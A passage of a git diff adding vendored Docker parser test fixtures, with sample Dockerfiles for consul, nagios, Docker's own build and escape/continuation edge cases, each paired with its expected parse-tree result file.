+	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
+	&& rm /tmp/dpkg.* \
+	&& rm -rf $GOPATH
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result
new file mode 100644
index 0000000000..227f748cda
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result
@@ -0,0 +1,5 @@
+(from "brimstone/ubuntu:14.04")
+(maintainer "brimstone@the.narro.ws")
+(env "GOPATH" "/go")
+(entrypoint "/usr/local/bin/consuldock")
+(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean     && apt-get install -y --no-install-recommends git golang ca-certificates     && apt-get clean     && rm -rf /var/lib/apt/lists \t&& go get -v github.com/brimstone/consuldock     && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile
new file mode 100644
index 0000000000..25ae352166
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile
@@ -0,0 +1,52 @@
+FROM brimstone/ubuntu:14.04
+
+CMD []
+
+ENTRYPOINT ["/usr/bin/consul", "agent", "-server", "-data-dir=/consul", "-client=0.0.0.0", "-ui-dir=/webui"]
+
+EXPOSE 8500 8600 8400 8301 8302
+
+RUN apt-get update \
+    && apt-get install -y unzip wget \
+	&& apt-get clean \
+	&& rm -rf /var/lib/apt/lists
+
+RUN cd /tmp \
+    && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \
+       -O web_ui.zip \
+    && unzip web_ui.zip \
+    && mv dist /webui \
+    && rm web_ui.zip
+
+RUN apt-get update \
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
+    && apt-get install -y --no-install-recommends unzip wget \
+    && apt-get clean \
+    && rm -rf /var/lib/apt/lists \
+
+    && cd /tmp \
+    && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \
+       -O web_ui.zip \
+    && unzip web_ui.zip \
+    && mv dist /webui \
+    && rm web_ui.zip \
+
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
+	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
+	&& rm /tmp/dpkg.*
+
+ENV GOPATH /go
+
+RUN apt-get update \
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
+    && apt-get install -y --no-install-recommends git golang ca-certificates build-essential \
+    && apt-get clean \
+    && rm -rf /var/lib/apt/lists \
+
+	&& go get -v github.com/hashicorp/consul \
+	&& mv $GOPATH/bin/consul /usr/bin/consul \
+
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
+	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
+	&& rm /tmp/dpkg.* \
+	&& rm -rf $GOPATH
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result
new file mode 100644
index 0000000000..16492e516a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result
@@ -0,0 +1,9 @@
+(from "brimstone/ubuntu:14.04")
+(cmd)
+(entrypoint "/usr/bin/consul" "agent" "-server" "-data-dir=/consul" "-client=0.0.0.0" "-ui-dir=/webui")
+(expose "8500" "8600" "8400" "8301" "8302")
+(run "apt-get update     && apt-get install -y unzip wget \t&& apt-get clean \t&& rm -rf /var/lib/apt/lists")
+(run "cd /tmp     && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip        -O web_ui.zip     && unzip web_ui.zip     && mv dist /webui     && rm web_ui.zip")
+(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean     && apt-get install -y --no-install-recommends unzip wget     && apt-get clean     && rm -rf /var/lib/apt/lists     && cd /tmp     && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip        -O web_ui.zip     && unzip web_ui.zip     && mv dist /webui     && rm web_ui.zip \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.*")
+(env "GOPATH" "/go")
+(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean     && apt-get install -y --no-install-recommends git golang ca-certificates build-essential     && apt-get clean     && rm -rf /var/lib/apt/lists \t&& go get -v github.com/hashicorp/consul \t&& mv $GOPATH/bin/consul /usr/bin/consul \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile
new file mode 100644
index 0000000000..42b324e77b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile
@@ -0,0 +1,36 @@
+FROM ubuntu:14.04
+
+RUN echo hello\
+  world\
+  goodnight  \
+  moon\
+  light\
+ning
+RUN echo hello  \
+  world
+RUN echo hello  \
+world
+RUN echo hello \
+goodbye\
+frog
+RUN echo hello  \  
+world
+RUN echo hi \
+ \
+ world \
+\
+ good\
+\
+night
+RUN echo goodbye\
+frog
+RUN echo good\
+bye\
+frog
+
+RUN echo hello \
+# this is a comment
+
+# this is a comment with a blank line surrounding it
+
+this is some more useful stuff
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result
new file mode 100644
index 0000000000..268ae073c8
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result
@@ -0,0 +1,10 @@
+(from "ubuntu:14.04")
+(run "echo hello  world  goodnight    moon  lightning")
+(run "echo hello    world")
+(run "echo hello  world")
+(run "echo hello goodbyefrog")
+(run "echo hello  world")
+(run "echo hi   world  goodnight")
+(run "echo goodbyefrog")
+(run "echo goodbyefrog")
+(run "echo hello this is some more useful stuff")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile
new file mode 100644
index 0000000000..8ccb71a578
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile
@@ -0,0 +1,54 @@
+FROM cpuguy83/ubuntu
+ENV NAGIOS_HOME /opt/nagios
+ENV NAGIOS_USER nagios
+ENV NAGIOS_GROUP nagios
+ENV NAGIOS_CMDUSER nagios
+ENV NAGIOS_CMDGROUP nagios
+ENV NAGIOSADMIN_USER nagiosadmin
+ENV NAGIOSADMIN_PASS nagios
+ENV APACHE_RUN_USER nagios
+ENV APACHE_RUN_GROUP nagios
+ENV NAGIOS_TIMEZONE UTC
+
+RUN sed -i 's/universe/universe multiverse/' /etc/apt/sources.list
+RUN apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx
+RUN ( egrep -i  "^${NAGIOS_GROUP}" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i "^${NAGIOS_CMDGROUP}" /etc/group || groupadd $NAGIOS_CMDGROUP )
+RUN ( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )
+
+ADD http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3 /tmp/nagios.tar.gz
+RUN cd /tmp && tar -zxvf nagios.tar.gz && cd nagios  && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf
+ADD http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz /tmp/
+RUN cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install
+
+RUN sed -i.bak 's/.*\=www\-data//g' /etc/apache2/envvars
+RUN export DOC_ROOT="DocumentRoot $(echo $NAGIOS_HOME/share)"; sed -i "s,DocumentRoot.*,$DOC_ROOT," /etc/apache2/sites-enabled/000-default
+
+RUN ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo
+
+RUN echo "use_timezone=$NAGIOS_TIMEZONE" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo "SetEnv TZ \"${NAGIOS_TIMEZONE}\"" >> /etc/apache2/conf.d/nagios.conf
+
+RUN mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs
+RUN echo "cfg_dir=${NAGIOS_HOME}/etc/conf.d" >> ${NAGIOS_HOME}/etc/nagios.cfg
+RUN echo "cfg_dir=${NAGIOS_HOME}/etc/monitor" >> ${NAGIOS_HOME}/etc/nagios.cfg
+RUN download-mibs && echo "mibs +ALL" > /etc/snmp/snmp.conf
+
+RUN sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && \
+  sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg
+RUN cp /etc/services /var/spool/postfix/etc/
+
+RUN mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix
+ADD nagios.init /etc/sv/nagios/run
+ADD apache.init /etc/sv/apache/run
+ADD postfix.init /etc/sv/postfix/run
+ADD postfix.stop /etc/sv/postfix/finish
+
+ADD start.sh /usr/local/bin/start_nagios
+
+ENV APACHE_LOCK_DIR /var/run
+ENV APACHE_LOG_DIR /var/log/apache2
+
+EXPOSE 80
+
+VOLUME ["/opt/nagios/var", "/opt/nagios/etc", "/opt/nagios/libexec", "/var/log/apache2", "/usr/share/snmp/mibs"]
+
+CMD ["/usr/local/bin/start_nagios"]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result
new file mode 100644
index 0000000000..25dd3ddfe5
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result
@@ -0,0 +1,40 @@
+(from "cpuguy83/ubuntu")
+(env "NAGIOS_HOME" "/opt/nagios")
+(env "NAGIOS_USER" "nagios")
+(env "NAGIOS_GROUP" "nagios")
+(env "NAGIOS_CMDUSER" "nagios")
+(env "NAGIOS_CMDGROUP" "nagios")
+(env "NAGIOSADMIN_USER" "nagiosadmin")
+(env "NAGIOSADMIN_PASS" "nagios")
+(env "APACHE_RUN_USER" "nagios")
+(env "APACHE_RUN_GROUP" "nagios")
+(env "NAGIOS_TIMEZONE" "UTC")
+(run "sed -i 's/universe/universe multiverse/' /etc/apt/sources.list")
+(run "apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx")
+(run "( egrep -i  \"^${NAGIOS_GROUP}\" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i \"^${NAGIOS_CMDGROUP}\" /etc/group || groupadd $NAGIOS_CMDGROUP )")
+(run "( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )")
+(add "http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3" "/tmp/nagios.tar.gz")
+(run "cd /tmp && tar -zxvf nagios.tar.gz && cd nagios  && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf")
+(add "http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz" "/tmp/")
+(run "cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install")
+(run "sed -i.bak 's/.*\\=www\\-data//g' /etc/apache2/envvars")
+(run "export DOC_ROOT=\"DocumentRoot $(echo $NAGIOS_HOME/share)\"; sed -i \"s,DocumentRoot.*,$DOC_ROOT,\" /etc/apache2/sites-enabled/000-default")
+(run "ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo")
+(run "echo \"use_timezone=$NAGIOS_TIMEZONE\" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo \"SetEnv TZ \\\"${NAGIOS_TIMEZONE}\\\"\" >> /etc/apache2/conf.d/nagios.conf")
+(run "mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs")
+(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/conf.d\" >> ${NAGIOS_HOME}/etc/nagios.cfg")
+(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/monitor\" >> ${NAGIOS_HOME}/etc/nagios.cfg")
+(run "download-mibs && echo \"mibs +ALL\" > /etc/snmp/snmp.conf")
+(run "sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg &&   sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg")
+(run "cp /etc/services /var/spool/postfix/etc/")
+(run "mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix")
+(add "nagios.init" "/etc/sv/nagios/run")
+(add "apache.init" "/etc/sv/apache/run")
+(add "postfix.init" "/etc/sv/postfix/run")
+(add "postfix.stop" "/etc/sv/postfix/finish")
+(add "start.sh" "/usr/local/bin/start_nagios")
+(env "APACHE_LOCK_DIR" "/var/run")
+(env "APACHE_LOG_DIR" "/var/log/apache2")
+(expose "80")
+(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs")
+(cmd "/usr/local/bin/start_nagios")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile
new file mode 100644
index 0000000000..99fbe55be0
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile
@@ -0,0 +1,103 @@
+# This file describes the standard way to build Docker, using docker
+#
+# Usage:
+#
+# # Assemble the full dev environment. This is slow the first time.
+# docker build -t docker .
+#
+# # Mount your source in an interactive container for quick testing:
+# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+#
+# # Run the test suite:
+# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+#
+# # Publish a release:
+# docker run --privileged \
+#  -e AWS_S3_BUCKET=baz \
+#  -e AWS_ACCESS_KEY=foo \
+#  -e AWS_SECRET_KEY=bar \
+#  -e GPG_PASSPHRASE=gloubiboulga \
+#  docker hack/release.sh
+#
+# Note: AppArmor used to mess with privileged mode, but this is no longer
+# the case. Therefore, you don't have to disable it anymore.
+#
+
+FROM	ubuntu:14.04
+MAINTAINER	Tianon Gravi <admwiggin@gmail.com> (@tianon)
+
+# Packaged dependencies
+RUN	apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \
+	apt-utils \
+	aufs-tools \
+	automake \
+	btrfs-tools \
+	build-essential \
+	curl \
+	dpkg-sig \
+	git \
+	iptables \
+	libapparmor-dev \
+	libcap-dev \
+	libsqlite3-dev \
+	mercurial \
+	pandoc \
+	parallel \
+	reprepro \
+	ruby1.9.1 \
+	ruby1.9.1-dev \
+	s3cmd=1.1.0* \
+	--no-install-recommends
+
+# Get lvm2 source for compiling statically
+RUN	git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103
+# see https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
+# note: we don't use "git clone -b" above because it then spews big nasty warnings about 'detached HEAD' state that we can't silence as easily as we can silence them using "git checkout" directly
+
+# Compile and install lvm2
+RUN	cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper
+# see https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
+
+# Install Go
+RUN	curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz
+ENV	PATH	/usr/local/go/bin:$PATH
+ENV	GOPATH	/go:/go/src/github.com/docker/docker/vendor
+RUN	cd /usr/local/go/src && ./make.bash --no-clean 2>&1
+
+# Compile Go for cross compilation
+ENV	DOCKER_CROSSPLATFORMS	\
+	linux/386 linux/arm \
+	darwin/amd64 darwin/386 \
+	freebsd/amd64 freebsd/386 freebsd/arm
+# (set an explicit GOARM of 5 for maximum compatibility)
+ENV	GOARM	5
+RUN	cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'
+
+# Grab Go's cover tool for dead-simple code coverage testing
+RUN	go get golang.org/x/tools/cmd/cover
+
+# TODO replace FPM with some very minimal debhelper stuff
+RUN	gem install --no-rdoc --no-ri fpm --version 1.0.2
+
+# Get the "busybox" image source so we can build locally instead of pulling
+RUN	git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox
+
+# Setup s3cmd config
+RUN	/bin/echo -e '[default]\naccess_key=$AWS_ACCESS_KEY\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg
+
+# Set user.email so crosbymichael's in-container merge commits go smoothly
+RUN	git config --global user.email 'docker-dummy@example.com'
+
+# Add an unprivileged user to be used for tests which need it
+RUN groupadd -r docker
+RUN useradd --create-home --gid docker unprivilegeduser
+
+VOLUME	/var/lib/docker
+WORKDIR	/go/src/github.com/docker/docker
+ENV	DOCKER_BUILDTAGS	apparmor selinux
+
+# Wrap all commands in the "docker-in-docker" script to allow nested containers
+ENTRYPOINT	["hack/dind"]
+
+# Upload docker source
+COPY	.	/go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result
new file mode 100644
index 0000000000..d032f9bac4
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result
@@ -0,0 +1,24 @@
+(from "ubuntu:14.04")
+(maintainer "Tianon Gravi <admwiggin@gmail.com> (@tianon)")
+(run "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \tapt-utils \taufs-tools \tautomake \tbtrfs-tools \tbuild-essential \tcurl \tdpkg-sig \tgit \tiptables \tlibapparmor-dev \tlibcap-dev \tlibsqlite3-dev \tmercurial \tpandoc \tparallel \treprepro \truby1.9.1 \truby1.9.1-dev \ts3cmd=1.1.0* \t--no-install-recommends")
+(run "git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103")
+(run "cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper")
+(run "curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz")
+(env "PATH" "/usr/local/go/bin:$PATH")
+(env "GOPATH" "/go:/go/src/github.com/docker/docker/vendor")
+(run "cd /usr/local/go/src && ./make.bash --no-clean 2>&1")
+(env "DOCKER_CROSSPLATFORMS" "linux/386 linux/arm \tdarwin/amd64 darwin/386 \tfreebsd/amd64 freebsd/386 freebsd/arm")
+(env "GOARM" "5")
+(run "cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'")
+(run "go get golang.org/x/tools/cmd/cover")
+(run "gem install --no-rdoc --no-ri fpm --version 1.0.2")
+(run "git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox")
+(run "/bin/echo -e '[default]\\naccess_key=$AWS_ACCESS_KEY\\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg")
+(run "git config --global user.email 'docker-dummy@example.com'")
+(run "groupadd -r docker")
+(run "useradd --create-home --gid docker unprivilegeduser")
+(volume "/var/lib/docker")
+(workdir "/go/src/github.com/docker/docker")
+(env "DOCKER_BUILDTAGS" "apparmor selinux")
+(entrypoint "hack/dind")
+(copy "." "/go/src/github.com/docker/docker")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile
new file mode 100644
index 0000000000..08fa18acec
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile
@@ -0,0 +1,23 @@
+FROM ubuntu
+ENV name value
+ENV name=value
+ENV name=value name2=value2
+ENV name="value value1"
+ENV name=value\ value2
+ENV name="value'quote space'value2"
+ENV name='value"double quote"value2'
+ENV name=value\ value2 name2=value2\ value3
+ENV name="a\"b"
+ENV name="a\'b"
+ENV name='a\'b'
+ENV name='a\'b''
+ENV name='a\"b'
+ENV name="''"
+# don't put anything after the next line - it must be the last line of the
+# Dockerfile and it must end with \
+ENV name=value \
+    name1=value1 \
+    name2="value2a \
+           value2b" \
+    name3="value3a\n\"value3b\"" \
+	name4="value4a\\nvalue4b" \
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result
new file mode 100644
index 0000000000..ba0a6dd7cb
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result
@@ -0,0 +1,16 @@
+(from "ubuntu")
+(env "name" "value")
+(env "name" "value")
+(env "name" "value" "name2" "value2")
+(env "name" "\"value value1\"")
+(env "name" "value\\ value2")
+(env "name" "\"value'quote space'value2\"")
+(env "name" "'value\"double quote\"value2'")
+(env "name" "value\\ value2" "name2" "value2\\ value3")
+(env "name" "\"a\\\"b\"")
+(env "name" "\"a\\'b\"")
+(env "name" "'a\\'b'")
+(env "name" "'a\\'b''")
+(env "name" "'a\\\"b'")
+(env "name" "\"''\"")
+(env "name" "value" "name1" "value1" "name2" "\"value2a            value2b\"" "name3" "\"value3a\\n\\\"value3b\\\"\"" "name4" "\"value4a\\\\nvalue4b\"")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile
new file mode 100644
index 0000000000..6def7efdcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile
@@ -0,0 +1,9 @@
+# Comment here. Should not be looking for the following parser directive.
+# Hence the following line will be ignored, and the subsequent backslash
+# continuation will be the default.
+# escape = `
+
+FROM image
+MAINTAINER foo@bar.com
+ENV GOPATH \
+\go
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result
new file mode 100644
index 0000000000..21522a880b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result
@@ -0,0 +1,3 @@
+(from "image")
+(maintainer "foo@bar.com")
+(env "GOPATH" "\\go")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile
new file mode 100644
index 0000000000..08a8cc4326
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile
@@ -0,0 +1,7 @@
+# escape = ``
+# There is no white space line after the directives. This still succeeds, but goes
+# against best practices.
+FROM image
+MAINTAINER foo@bar.com
+ENV GOPATH `
+\go
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result
new file mode 100644
index 0000000000..21522a880b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result
@@ -0,0 +1,3 @@
+(from "image")
+(maintainer "foo@bar.com")
+(env "GOPATH" "\\go")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile
new file mode 100644
index 0000000000..ef30414a5e
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile
@@ -0,0 +1,6 @@
+#escape = `
+
+FROM image
+MAINTAINER foo@bar.com
+ENV GOPATH `
+\go
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result
new file mode 100644
index 0000000000..21522a880b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result
@@ -0,0 +1,3 @@
+(from "image")
+(maintainer "foo@bar.com")
+(env "GOPATH" "\\go")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile
new file mode 100644
index 0000000000..1ffb17ef08
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile
@@ -0,0 +1,14 @@
+FROM ubuntu:14.04
+MAINTAINER Erik \\Hollensbe <erik@hollensbe.org>\"
+
+RUN apt-get \update && \
+  apt-get \"install znc -y
+ADD \conf\\" /.znc
+
+RUN foo \
+
+bar \
+
+baz
+
+CMD [ "\/usr\\\"/bin/znc", "-f", "-r" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result
new file mode 100644
index 0000000000..13e409cb1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result
@@ -0,0 +1,6 @@
+(from "ubuntu:14.04")
+(maintainer "Erik \\\\Hollensbe <erik@hollensbe.org>\\\"")
+(run "apt-get \\update &&   apt-get \\\"install znc -y")
+(add "\\conf\\\\\"" "/.znc")
+(run "foo bar baz")
+(cmd "/usr\\\"/bin/znc" "-f" "-r")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile
new file mode 100644
index 0000000000..2418e0f069
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile
@@ -0,0 +1,10 @@
+FROM scratch
+COPY foo /tmp/
+COPY --user=me foo /tmp/
